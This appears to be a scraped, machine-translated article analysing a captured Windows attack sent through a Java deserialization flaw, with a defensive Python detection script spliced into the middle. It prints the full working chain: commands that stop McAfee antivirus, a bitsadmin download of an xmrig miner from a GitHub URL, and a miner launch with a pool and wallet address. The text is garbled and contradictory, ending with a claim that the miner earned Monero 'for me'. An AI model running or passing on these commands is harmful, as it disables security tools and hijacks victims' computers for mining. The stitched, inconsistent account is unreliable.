How a Java deserialization vulnerability is used to run an experiment on Windows

2025-04-05 Update From: SLTechnology News&Howtos

Shulou(Shulou.com)06/02 Report--

In this issue, Xiaobian looks at how Java deserialization vulnerabilities are used for experiments on Windows. The article is detailed and analyzes the topic from a professional perspective; after reading it, I hope you will have gained something.

Recently there has been a lot of discussion in the security community about exploiting Java deserialization vulnerabilities against systems such as Apache, SOLR, and LOGY. Let's cut to the chase. The vast majority of these attacks currently target Linux/Unix systems, but I recently discovered one aimed at Windows.

The attack command, as captured, is as follows (spacing restored where extraction had run tokens together; the unbalanced quotes are as observed):

cmd /c net stop "McAfee McShield;net stop mcafeeframework;bitsadmin.exe /transfer "xmrig.bat" /download /priority foreground http://raw.githubusercontent.com/sirikun/starships/master/xmrig.bat "%cd%\xmrig.bat";bitsadmin.exe /transfer "xmrig.exe" /download /priority foreground http://raw.githubusercontent.com/sirikun/starships/master/xmrig.exe "%cd%\xmrig.exe;dir xmrig*;xmrig.bat;tasklist;

Actual Payload Analysis

Stop the McAfee antivirus services (I don't understand why the technique seen in the community only disables McAfee…):

net stop "McAfee McShield;net stop mcafeeframework;

Download a cryptocurrency miner and a batch script from GitHub using bitsadmin, saving them into the current working directory of the exploited process (%cd%):

bitsadmin.exe /transfer "xmrig.bat" /download /priority foreground http://raw.githubusercontent.com/sirikun/starships/master/xmrig.bat "%cd%\xmrig.bat";bitsadmin.exe /transfer "xmrig.exe" /download /priority foreground http://raw.githubusercontent.com/sirikun/starships/master/xmrig.exe "%cd%\xmrig.exe;dir xmrig*;xmrig.bat;tasklist;

The batch file (xmrig.bat) contains the following lines:

taskkill /im /f xmrig.exe /t
net stop "McAfee McShield"
net stop mcafeeframework
xmrig.exe -o monerohash.com:3333 -u 42jF56tc85UTZwhMQc6rHbMHTxHqK74qS2zqLyRZxLbwegsy7FJ9w4T5B69Ay5qeMEMuvVDwHNeopAxrEZkkHrMb5phovJ6 -p x --background --max-cpu-usage=50 --donate-level=1

First, the batch file terminates any other running xmrig processes (perhaps to prevent resource contention). Next, it stops the McAfee services. The miner then starts in the background and connects to the monerohash.com pool on port 3333, capped at about 50% CPU usage, presumably so that it is less likely to be noticed.
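The chain above leaves three distinct process-creation events on the host: a service stop aimed at the antivirus, a bitsadmin download, and a miner launched with pool and wallet arguments. As an added defender-side example (not code from the original article), the Python below classifies constructed Sysmon-style process-creation records into those stages and correlates them per host; the field names, file paths, parent-process list and the sample wallet value are assumptions.

```python
import re

# Constructed Sysmon-style process-creation records for testing (not taken from the page).
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\solr\jre\bin\java.exe", "Image": r"C:\Windows\System32\net.exe",
     "CommandLine": 'net stop "McAfee McShield"'},
    {"ParentImage": r"C:\Windows\System32\cmd.exe", "Image": r"C:\Windows\System32\bitsadmin.exe",
     "CommandLine": 'bitsadmin.exe /transfer "xmrig.exe" /download /priority foreground '
                    'http://example.invalid/xmrig.exe C:\\solr\\xmrig.exe'},
    {"ParentImage": r"C:\Windows\System32\cmd.exe", "Image": r"C:\solr\xmrig.exe",
     "CommandLine": "xmrig.exe -o monerohash.com:3333 -u 4CONSTRUCTEDWALLET -p x "
                    "--background --max-cpu-usage=50"},
    {"ParentImage": r"C:\Windows\System32\services.exe", "Image": r"C:\Windows\System32\net.exe",
     "CommandLine": "net stop spooler"},  # benign: an operator restarting a service
]

# One regex per stage of the observed chain, evaluated case-insensitively over CommandLine.
# The miner stage keys on the stratum pool (-o host:port) plus wallet (-u ...) arguments rather
# than on the file name "xmrig", because a renamed binary would otherwise slip past.
STAGE_PATTERNS = {
    "av_service_stop": re.compile(r'\bnet(1)?(\.exe)?\s+stop\s+"?(mcafee|mcshield|windefend|sense)', re.I),
    "bitsadmin_download": re.compile(r"\bbitsadmin(\.exe)?\b.*/transfer\b.*/download\b.*https?://", re.I),
    "miner_launch": re.compile(r"\s-o\s+[\w.-]+:\d{2,5}\b.*\s-u\s+\S+", re.I),
}
# Parents from which net.exe, bitsadmin.exe or an unknown binary should not normally be spawned
# on an application-server host (assumed list; extend for the server in use).
SUSPICIOUS_PARENTS = ("java.exe", "javaw.exe", "tomcat", "w3wp.exe")

def classify(event):
    """Return the set of chain stages matched by a single process-creation event."""
    cmd = event.get("CommandLine", "")
    return {name for name, pat in STAGE_PATTERNS.items() if pat.search(cmd)}

def spawned_by_app_server(event):
    """True when the parent is an application-server process such as the exploited JVM."""
    parent = event.get("ParentImage", "").lower()
    return any(p in parent for p in SUSPICIOUS_PARENTS)

def triage(events):
    """Correlate the events of one host and decide whether the chain warrants an alert."""
    stages, from_app_server = set(), False
    for ev in events:
        hit = classify(ev)
        stages |= hit
        if hit and spawned_by_app_server(ev):
            from_app_server = True
    # Two independent stages, or any stage launched directly from the app server, is enough.
    alert = len(stages) >= 2 or from_app_server
    return {"stages": sorted(stages), "from_app_server": from_app_server, "alert": alert}
```

On the sample records, the single benign `net stop spooler` event does not alert, while the three payload stages do, with the service stop additionally flagged because its parent is java.exe.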

So far, this miner has only been able to compute 350 hashes per second and has mined 40 Monero coins (worth about $7000) for me.

The above is how a Java deserialization vulnerability is used to run an experiment on Windows; if you encounter a similar question, the analysis above may help you understand it.
